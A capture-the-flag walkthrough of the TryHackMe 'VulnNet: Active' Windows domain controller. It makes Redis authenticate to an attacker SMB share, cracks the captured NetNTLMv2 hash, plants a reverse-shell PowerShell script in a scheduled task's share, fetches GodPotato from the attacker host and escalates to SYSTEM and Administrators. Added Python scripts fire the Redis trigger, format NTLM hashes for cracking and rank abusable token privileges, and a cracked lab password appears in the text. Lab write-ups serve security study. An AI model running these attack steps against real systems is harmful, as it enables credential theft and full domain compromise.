wp-tryhackme-vulnnetactive

vulnnetactive


➜ ~ rustscan -a 10.10.241.222
...
Open 10.10.241.222:53
Open 10.10.241.222:135
Open 10.10.241.222:139
Open 10.10.241.222:445
Open 10.10.241.222:464
Open 10.10.241.222:6379
Open 10.10.241.222:9389
# plus a run of 49xxx ports: Windows RPC dynamic (ephemeral) ports, not RDP
...
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
...

# rustscan's nmap pass failed its ping probe; I could add -Pn there and rerun,
# but a direct nmap against just the open ports is easier
➜ ~ nmap -p 53,135,139,445,464,6379,9389,49668,49669,49670,49665,49695,49684,49725 y -sV -Pn
# (y = the target address; over OpenVPN a full nmap scan is far too slow, so only the open ports get -sV)
...
PORT STATE SERVICE VERSION
53/tcp open domain (generic dns response: SERVFAIL)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
6379/tcp open redis Redis key-value store 2.8.2402
9389/tcp open mc-nmf .NET Message Framing

Try a null session with rpcclient:

➜  ~ rpcclient -U "" -N 10.10.241.222
Can't load /etc/samba/smb.conf - run testparm to debug it
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED

Try anonymous SMB on port 445:

➜  ~ smbclient --list=10.10.241.222 --no-pass
Can't load /etc/samba/smb.conf - run testparm to debug it
Anonymous login successful

Sharename Type Comment
--------- ---- -------
SMB1 disabled -- no workgroup available

Anonymous login works, but no shares are listed. Redis on 6379, however, accepts unauthenticated connections:

➜  ~ redis-cli -h 10.10.241.222 -p 6379
10.10.241.222:6379>
# anon login
10.10.181.236:6379> info
...
redis_version:2.8.2402
...

I first tried a buffer-overflow exploit against Redis here; it took the box down and I had to restart it (my mistake). After reading other writeups, this is the route that works: make Redis open a UNC path so the service account authenticates to our SMB server, then crack the captured NetNTLMv2 hash. (The box came back with a new address, 10.10.85.177, after the restart.)

➜  tmp mkdir share
➜ tmp sudo smbserver.py share ./share/ -smb2support

# in another terminal: EVAL a Lua script that opens a UNC path pointing at our share
➜ ~ redis-cli -h 10.10.85.177 -p 6379
10.10.85.177:6379>
10.10.85.177:6379> eval "dofile('//10.2.30.143/share')" 0
(error) ERR Error running script (call to f_543eb4e9bfd7a56b2435c29889e09eded2d76127): @user_script:1: cannot open //10.2.30.143/share: Invalid argument
(8.88s)
# the Lua error is expected: before the open could fail, Windows connected to our SMB server and authenticated as the account Redis runs under
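Here is the same trigger done by hand over Redis's RESP wire protocol, as an added example that is not code from the original writeup. The host, port and attacker address are the ones from this writeup; the helper names are mine. The point it makes: the Lua "cannot open" error is the success signal, because dofile blocked on the UNC open while Windows connected to the SMB server and answered its NTLM challenge with the service account's credentials. A NOAUTH reply (requirepass is set) or a nil-value error for dofile (newer Redis builds strip it from the Lua sandbox) means the trigger never fired.

```python
import socket


class RedisError(Exception):
    """An error reply ('-...') from the server."""

    @property
    def message(self) -> str:
        return self.args[0]


def resp_encode(*args: str) -> bytes:
    """Encode a command as a RESP array of bulk strings; this is exactly what redis-cli sends."""
    parts = [b"*%d\r\n" % len(args)]
    for arg in args:
        raw = arg.encode()
        parts.append(b"$%d\r\n%s\r\n" % (len(raw), raw))
    return b"".join(parts)


def resp_decode(data: bytes):
    """Decode one RESP reply (simple string, error, integer, bulk string or array).
    Returns (value, unconsumed_bytes)."""
    kind, body = data[:1], data[1:]
    line, _, rest = body.partition(b"\r\n")
    if kind == b"+":
        return line.decode(), rest
    if kind == b"-":
        return RedisError(line.decode()), rest
    if kind == b":":
        return int(line), rest
    if kind == b"$":
        n = int(line)
        if n < 0:                      # null bulk string
            return None, rest
        return rest[:n].decode(errors="replace"), rest[n + 2:]
    if kind == b"*":
        items = []
        for _ in range(int(line)):
            item, rest = resp_decode(rest)
            items.append(item)
        return items, rest
    raise ValueError(f"unexpected RESP prefix {kind!r}")


def unc_trigger(attacker_ip: str, share: str = "share") -> str:
    """Lua that makes the Redis *process* open a UNC path. On Windows the SMB redirector
    answers the server's NTLM challenge with the credentials of the account running Redis."""
    return f"dofile('//{attacker_ip}/{share}')"


def classify_eval_reply(reply) -> str:
    """Turn the EVAL reply into the thing a tester actually wants to know."""
    if isinstance(reply, RedisError):
        msg = reply.message
        if msg.startswith("NOAUTH"):
            return "auth required: requirepass is set, trigger not sent"
        if "cannot open" in msg:
            return "dofile ran: the service opened the UNC path, check the SMB server for the NTLM exchange"
        if "attempt to call" in msg and "nil" in msg:
            return "dofile is not available in this Redis build (removed from the Lua sandbox)"
        return f"other error: {msg}"
    return f"unexpected success reply: {reply!r}"


def run_trigger(host: str, port: int, attacker_ip: str, timeout: float = 15.0) -> str:
    """Connect without a password, confirm with PING, then fire the UNC trigger.
    Network use only; the pure functions above are what the offline checks exercise."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(resp_encode("PING"))
        pong, _ = resp_decode(s.recv(4096))
        if isinstance(pong, RedisError):
            return classify_eval_reply(pong)
        s.sendall(resp_encode("EVAL", unc_trigger(attacker_ip), "0"))
        # dofile blocks until the SMB attempt fails; that took ~9 s in this writeup
        reply, _ = resp_decode(s.recv(4096))
        return classify_eval_reply(reply)


if __name__ == "__main__":
    # addresses from this writeup; start smbserver.py on the attacker host first
    print(run_trigger("10.10.85.177", 6379, "10.2.30.143"))
```

Run smbserver.py before calling run_trigger, and give the socket a generous timeout: the EVAL reply only arrives after the SMB attempt has finished.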

Back in the smbserver.py terminal the authentication shows up:

[*] Incoming connection (10.10.85.177,49723)
[*] AUTHENTICATE_MESSAGE (VULNNET\enterprise-security,VULNNET-BC3TCK1)
[*] User VULNNET-BC3TCK1\enterprise-security authenticated successfully
[*] # smbserver.py prints the NetNTLMv2 hash here (redacted); save that line to a file named hash
[*] SMB_COM_TREE_CONNECT_ANDX (NT_STATUS_OK)
[*] SMB_COM_TREE_CONNECT_ANDX (NT_STATUS_OK)
[*] Closing down connection (10.10.85.177,49723)

# crack it with john
➜ tmp john ./hash --wordlist=/usr/share/wordlists/passwords/rockyou.txt
# this yields the password used below
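smbserver.py already prints the captured hash as a ready-to-crack line; the following added example (my code, not impacket's) shows where that line comes from by parsing the two NTLM messages. The CHALLENGE_MESSAGE (Type 2, sent by the server) carries the 8-byte server challenge at offset 24; the AUTHENTICATE_MESSAGE (Type 3, sent back by the Redis host) carries the NTLMv2 response, whose first 16 bytes are the NTProofStr and the rest the blob. john's netntlmv2 format and hashcat mode 5600 both want user::domain:challenge:NTProofStr:blob. The Type 2 and Type 3 messages used in the check are constructed here, with the user and NetBIOS domain from this box and made-up challenge and response bytes.

```python
import struct

NTLMSSP_NEGOTIATE_UNICODE = 0x00000001
# typical flags for a Unicode, NTLMv2-capable client; only the UNICODE bit matters here
DEFAULT_FLAGS = 0x00088205


def _payload_field(msg: bytes, offset: int) -> bytes:
    """Resolve a (Len, MaxLen, Offset) header field to its payload bytes."""
    length, _maxlen, start = struct.unpack_from("<HHI", msg, offset)
    return msg[start:start + length]


def server_challenge(type2: bytes) -> bytes:
    """The 8-byte ServerChallenge of a CHALLENGE_MESSAGE sits at offset 24."""
    if type2[:8] != b"NTLMSSP\x00" or struct.unpack_from("<I", type2, 8)[0] != 2:
        raise ValueError("not an NTLM CHALLENGE_MESSAGE")
    return type2[24:32]


def netntlmv2_line(challenge: bytes, type3: bytes) -> str:
    """Produce the john/hashcat (5600) line: user::domain:challenge:NTProofStr:blob."""
    if type3[:8] != b"NTLMSSP\x00" or struct.unpack_from("<I", type3, 8)[0] != 3:
        raise ValueError("not an NTLM AUTHENTICATE_MESSAGE")
    if len(challenge) != 8:
        raise ValueError("server challenge must be 8 bytes")
    nt_resp = _payload_field(type3, 20)     # NtChallengeResponseFields
    domain = _payload_field(type3, 28)      # DomainNameFields
    user = _payload_field(type3, 36)        # UserNameFields
    flags = struct.unpack_from("<I", type3, 60)[0]
    enc = "utf-16-le" if flags & NTLMSSP_NEGOTIATE_UNICODE else "latin-1"  # OEM fallback, fine for ASCII names
    if len(nt_resp) <= 24:
        raise ValueError("24-byte NT response is NTLMv1: use john's netntlm format instead")
    nt_proof, blob = nt_resp[:16], nt_resp[16:]
    return f"{user.decode(enc)}::{domain.decode(enc)}:{challenge.hex()}:{nt_proof.hex()}:{blob.hex()}"


def build_type2(challenge: bytes, flags: int = DEFAULT_FLAGS) -> bytes:
    """Constructed minimal CHALLENGE_MESSAGE for the offline check (empty TargetName)."""
    return (b"NTLMSSP\x00" + struct.pack("<I", 2) + struct.pack("<HHI", 0, 0, 48)
            + struct.pack("<I", flags) + challenge + bytes(16))


def build_type3(user: str, domain: str, workstation: str, nt_response: bytes,
                flags: int = DEFAULT_FLAGS) -> bytes:
    """Constructed AUTHENTICATE_MESSAGE for the offline check; real ones arrive inside
    the SMB session setup. Header is 64 bytes (no Version/MIC), payload follows."""
    enc = lambda s: s.encode("utf-16-le")
    payload, fields = b"", {}
    for name, data in (("domain", enc(domain)), ("user", enc(user)), ("ws", enc(workstation)),
                       ("lm", bytes(24)), ("nt", nt_response), ("key", b"")):
        fields[name] = struct.pack("<HHI", len(data), len(data), 64 + len(payload))
        payload += data
    header = (b"NTLMSSP\x00" + struct.pack("<I", 3) + fields["lm"] + fields["nt"]
              + fields["domain"] + fields["user"] + fields["ws"] + fields["key"]
              + struct.pack("<I", flags))
    return header + payload


if __name__ == "__main__":
    # constructed sample: names from this box, challenge/response bytes invented
    chal = bytes.fromhex("1122334455667788")
    resp = bytes.fromhex("aa" * 16) + bytes.fromhex("01010000000000000001020304050607")
    t3 = build_type3("enterprise-security", "VULNNET", "VULNNET-BC3TCK1", resp)
    print(netntlmv2_line(server_challenge(build_type2(chal)), t3))
```

The challenge is chosen by the server, which is why a capturing server (smbserver.py here) can print the complete line on its own: it knows the challenge, and the client hands it everything else.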

10.10.85.177:6379> config get *
# the dir setting also confirms which account Redis runs as: enterprise-security
104) "C:\\Users\\enterprise-security\\Downloads\\Redis-x64-2.8.2402"

# list shares
➜ tmp smbclient --list=10.10.85.177 --user="enterprise-security"
Can't load /etc/samba/smb.conf - run testparm to debug it
Password for [WORKGROUP\enterprise-security]:  # enter the cracked password

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Enterprise-Share Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available


# connect to the non-default share with the username and password
➜ tmp smbclient //10.10.85.177/Enterprise-Share --user enterprise-security%sand_0873959498
Can't load /etc/samba/smb.conf - run testparm to debug it
Try "help" to get a list of possible commands.
smb: \> ls
# a single small script; grab it
PurgeIrrelevantData_1826.ps1 A 69 Wed Feb 24 08:33:18 2021

smb: \> get PurgeIrrelevantData_1826.ps1
getting file \PurgeIrrelevantData_1826.ps1 of size 69 as PurgeIrrelevantData_1826.ps1 (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)

# check the file
➜ tmp cat PurgeIrrelevantData_1826.ps1
rm -Force C:\Users\Public\Documents\* -ErrorAction SilentlyContinue
# a cleanup one-liner sitting in a share we can write to: almost certainly run by a scheduled task as enterprise-security, so whatever we put in this file runs as that user


Overwrite the script with a reverse shell, upload it, and wait for the task to run it.

I generated a PowerShell reverse shell with an online reverse shell generator.

➜  tmp vim PurgeIrrelevantData_1826.ps1
# replace the contents with the PowerShell reverse shell (listener 10.2.30.143:5555)

smb: \> put PurgeIrrelevantData_1826.ps1
putting file PurgeIrrelevantData_1826.ps1 as \PurgeIrrelevantData_1826.ps1 (0.8 kb/s) (average 0.8 kb/s)

➜ tmp nc -lvnp 5555
Connection from 10.10.85.177:49981
dir
nssm-2.24-101-g897c7ad Redis-x64-2.8.2402 startup.bat

# that first session didn't hold and I'm not sure why,
# so I restarted the box, uploaded the file again and bound the listener to the VPN address

➜ ~ nc -lvnp 5555 -s 10.2.30.143
Connection from 10.10.65.131:49878
# the callback takes up to a minute to arrive, which suggests the task runs on a one-minute schedule
PS C:\Users\enterprise-security\Downloads>

PS C:\Users\enterprise-security\Downloads>cd ../Desktop

PS C:\Users\enterprise-security\Desktop> cat user.txt
flag1 here

Check the user:

PS C:\Users\enterprise-security\Desktop> net user enterprise-security
User name enterprise-security
Full Name Enterprise Security
Comment TryHackMe
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 2/23/2021 3:01:37 PM
Password expires Never
Password changeable 2/24/2021 3:01:37 PM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon 2/15/2025 1:26:19 AM

Logon hours allowed All

Local Group Memberships
Global Group memberships *Domain Users
The command completed successfully.

And the host (it is the domain controller for vulnnet.local):

PS C:\Users\enterprise-security\Desktop> systeminfo

Host Name: VULNNET-BC3TCK1
OS Name: Microsoft Windows Server 2019 Datacenter Evaluation
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation
OS Configuration: Primary Domain Controller
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00431-20000-00000-AA463
Original Install Date: 2/22/2021, 11:43:53 AM
System Boot Time: 2/15/2025, 1:24:20 AM
System Manufacturer: Xen
System Model: HVM domU
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~2300 Mhz
BIOS Version: Xen 4.11.amazon, 8/24/2006
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory: 512 MB
Available Physical Memory: 22 MB
Virtual Memory: Max Size: 1,536 MB
Virtual Memory: Available: 563 MB
Virtual Memory: In Use: 973 MB
Page File Location(s): C:\pagefile.sys
Domain: vulnnet.local
Logon Server: N/A
Hotfix(s): 7 Hotfix(s) Installed.
[01]: KB4601558
[02]: KB4512577
[03]: KB4535680
[04]: KB4577586
[05]: KB4580325
[06]: KB4601393
[07]: KB4601345
Network Card(s): 1 NIC(s) Installed.
[01]: AWS PV Network Device
Connection Name: Ethernet 2
DHCP Enabled: Yes
DHCP Server: 10.10.0.1
IP address(es)
[01]: 10.10.65.131
[02]: fe80::1dd:1ec1:4c5:d082
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.

PS C:\Users\enterprise-security\Desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ========================================= ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

# SeImpersonatePrivilege is enabled, so a potato works: serve GodPotato over HTTP and fetch it from the target
➜ GodPotato ll
Permissions Size User Date Modified Name
.rw-r--r-- 57k arch 11 Apr 2023  GodPotato-NET2.exe
.rw-r--r-- 57k arch 11 Apr 2023  GodPotato-NET4.exe
.rw-r--r-- 57k arch 11 Apr 2023  GodPotato-NET35.exe
➜ GodPotato python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.65.131 - - [15/Feb/2025 17:50:22] "GET /GodPotato-NET2.exe HTTP/1.1" 200 -

PS C:\Users\enterprise-security\Desktop> wget http://10.2.30.143:8000/GodPotato-NET4.exe -O ./godp4.exe

PS C:\Users\enterprise-security\Desktop> ./godp4.exe -cmd "cmd /c dir C:\Users\Administrator"
[*] CombaseModule: 0x140733969006592
[*] DispatchTable: 0x140733971324080
[*] UseProtseqFunction: 0x140733970702976
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\4da21aff-ffb5-4a47-af7f-019eab286383\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00006402-0c10-ffff-ee0e-33ef74b5baf8
[*] DCOM obj OXID: 0xdd26d2fc8207ef
[*] DCOM obj OID: 0x77d89bccc1acede2
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 988 Token:0x652 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 3840
Volume in drive C has no label.
Volume Serial Number is AAC5-C2C2

Directory of C:\Users\Administrator

02/15/2025 01:57 AM <DIR> .
02/15/2025 01:57 AM <DIR> ..
02/22/2021 01:55 PM <DIR> 3D Objects
02/22/2021 01:55 PM <DIR> Contacts
02/23/2021 08:27 PM <DIR> Desktop
02/22/2021 01:55 PM <DIR> Documents
02/22/2021 01:55 PM <DIR> Downloads
02/22/2021 01:55 PM <DIR> Favorites
02/22/2021 01:55 PM <DIR> Links
02/22/2021 01:55 PM <DIR> Music
02/22/2021 01:55 PM <DIR> Pictures
02/22/2021 01:55 PM <DIR> Saved Games
02/22/2021 01:55 PM <DIR> Searches
02/22/2021 01:55 PM <DIR> Videos
0 File(s) 0 bytes
14 Dir(s) 21,037,834,240 bytes free


PS C:\Users\enterprise-security\Desktop> ./godp4.exe -cmd "cmd /c type C:\Users\Administrator\Desktop\system.txt"
[*] CombaseModule: 0x140733969006592
[*] DispatchTable: 0x140733971324080
[*] UseProtseqFunction: 0x140733970702976
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\99631637-198e-472d-9d6a-63e633c32bfb\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000cc02-0fd4-ffff-01d4-b1acf4583182
[*] DCOM obj OXID: 0xa6a0591471e2029c
[*] DCOM obj OID: 0x57e054a57b20a35a
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 988 Token:0x652 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 1952
flag2 here
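The privilege check that made GodPotato the obvious move, as an added example that is not from the original writeup: a small parser for whoami /priv output that flags the privileges worth escalating through. Two caveats it encodes: the State column only says whether a privilege is currently enabled, but any privilege present in the token can be enabled by the process itself with AdjustTokenPrivileges, so Disabled is not a blocker; and SeMachineAccountPrivilege only matters together with a non-zero ms-DS-MachineAccountQuota. The sample output is the one from this session, embedded as a constant so the script runs offline; the abuse notes and function names are mine.

```python
import re

# Privileges that give a path to SYSTEM or to arbitrary file access when *present* in a token.
# A Disabled privilege can be re-enabled by the holder (AdjustTokenPrivileges); only a removed
# privilege is really gone, and whoami /priv does not list removed ones at all.
TOKEN_ABUSE = {
    "SeImpersonatePrivilege": "impersonate a SYSTEM token obtained by coercing an auth (GodPotato, PrintSpoofer, JuicyPotato)",
    "SeAssignPrimaryTokenPrivilege": "same coercion-to-SYSTEM paths as SeImpersonate",
    "SeBackupPrivilege": "read any file regardless of ACL (SAM/SYSTEM hives, NTDS.dit)",
    "SeRestorePrivilege": "write any file regardless of ACL (replace a service binary)",
    "SeDebugPrivilege": "open any process, including LSASS, for a credential dump",
    "SeTakeOwnershipPrivilege": "take ownership of any object, then grant yourself access",
    "SeLoadDriverPrivilege": "load a signed but vulnerable kernel driver",
    "SeMachineAccountPrivilege": "create computer accounts (if ms-DS-MachineAccountQuota > 0): prerequisite for RBCD abuse",
}

# constructed sample: the whoami /priv output from this session
WHOAMI_PRIV_SAMPLE = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# one row: privilege name, free-text description, then the state word at the end of the line
_ROW = re.compile(r"^(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)\s*$")


def parse_whoami_priv(text: str):
    """Return [(name, description, state)] for each privilege row (English-locale output)."""
    rows = []
    for line in text.splitlines():
        m = _ROW.match(line.strip())
        if m:
            rows.append(m.groups())
    return rows


def abusable(text: str):
    """Privileges from the output that have a known escalation path, with state and a note.
    Order follows the output; state is reported but does not filter (see TOKEN_ABUSE comment)."""
    return [(name, state, TOKEN_ABUSE[name])
            for name, _desc, state in parse_whoami_priv(text) if name in TOKEN_ABUSE]


def potato_candidate(text: str) -> bool:
    """True when a potato-style impersonation attack is on the table."""
    names = {name for name, _s, _n in abusable(text)}
    return bool(names & {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"})


if __name__ == "__main__":
    for name, state, note in abusable(WHOAMI_PRIV_SAMPLE):
        print(f"{name:32} {state:9} {note}")
    print("potato candidate:", potato_candidate(WHOAMI_PRIV_SAMPLE))
```

On this box the script flags SeImpersonatePrivilege (enabled) and SeMachineAccountPrivilege (disabled); the first is the one GodPotato needed.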

Alternatively, add the user to the Administrators group and come back with a proper shell via impacket's psexec.py. Since this host is the domain controller, "net localgroup administrators" edits the domain's Builtin\Administrators group, so this is domain-admin-level access, not just local admin.

PS C:\Users\enterprise-security\Desktop>  ./godp4.exe -cmd "net localgroup administrators enterprise-security /add"

PS C:\Users\enterprise-security\Desktop> net user enterprise-security
...
Local Group Memberships *Administrators
Global Group memberships *Domain Users

# impacket's psexec.py, authenticating with the cracked password
➜ tmp psexec.py enterprise-security@10.10.65.131